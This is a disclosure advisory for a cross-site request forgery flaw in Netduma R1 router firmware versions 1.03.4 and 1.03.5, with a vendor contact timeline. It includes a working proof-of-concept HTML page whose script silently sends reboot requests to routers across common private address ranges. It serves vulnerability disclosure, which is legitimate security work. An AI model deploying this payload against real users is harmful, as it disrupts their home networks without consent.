Netduma R1 1.03.4 / 1.03.5 Cross Site Request Forgery

`## Introduction  
  
Affected Product: Netduma R1 Router  
Affected Version(s): 1.03.4 and 1.03.5  
Link: http://www.netduma.com/firmware/R1-v-1-03-4.sig  
Vendor Website: https://netduma.com/  
Vulnerability Type: CSRF  
Remote Exploitable: Yes  
Reported to vendor: 11/19/2015  
Disclosed to public: 12/29/2015  
Credits: @joshchaney  
  
## Vulnerability Summary  
  
There is no CSRF protection for any administrative actions, which would allow an attacker to modify router settings or reboot the router by getting the victim to visit an attacker controlled website.  
  
## Proof of Concept  
  
Reboot router:  
  
<html>  
<head>  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>  
</head>  
<body>  
<script>  
var i = 1;  
while (i < 255) {  
$.post("http://192.168." + i + ".1/cgi-bin/reboot.sh");  
i++;  
}  
</script>  
</body>  
</html>  
  
## Report Timeline  
  
11/19/2015 Informed vendor about issue through email  
11/29/2015 Tweeted to vendor about issue  
11/30/2015 Vendor tweeted that they would respond to email about issue  
12/07/2015 Emailed known customer about issue who forwarded email to CEO  
12/08/2015 CEO responded to email explaining he had passed the information to the lead developer  
12/29/2015 Disclosed to public for lack of acknowledgement of issue  
  
  
`